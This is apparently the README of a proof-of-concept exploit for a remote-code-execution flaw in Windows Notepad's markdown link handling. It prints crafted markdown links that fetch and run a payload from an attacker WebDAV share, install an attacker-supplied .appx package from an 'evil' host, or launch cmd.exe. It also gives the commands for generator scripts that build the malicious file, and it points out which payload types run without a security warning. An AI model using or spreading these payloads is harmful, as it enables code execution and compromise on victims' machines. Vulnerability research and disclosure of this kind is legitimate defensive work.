
Proof-of-concept exploit for CVE-2026-20841, a Windows Notepad RCE via markdown links. Generates crafted .md files to trigger remote payloads, app sideloading, or local binary execution.
PoC for a remote code execution flaw in Windows Notepad's markdown renderer. The markdown engine does not restrict URL protocols, allowing arbitrary protocol handlers to be triggered via clickable links.
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
The file:/// protocol resolves remote UNC paths. Link a payload and Windows will fetch and execute it on click.
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
Opens App Installer with an attacker-supplied .appx/.msix package.
file://)[click](file://C:/windows/system32/cmd.exe)
Launches any executable already on disk — cmd.exe, powershell.exe, mshta.exe, etc.
Both scripts generate a poc.md with a crafted link in the current directory.
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# example
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
Test payloads in payloads/.
.exe, .lnk, .vbs and similar trigger a Windows security warning regardless of Notepad's behavior..py and .jar execute silently if Python or Java is installed on the target.Stay safe!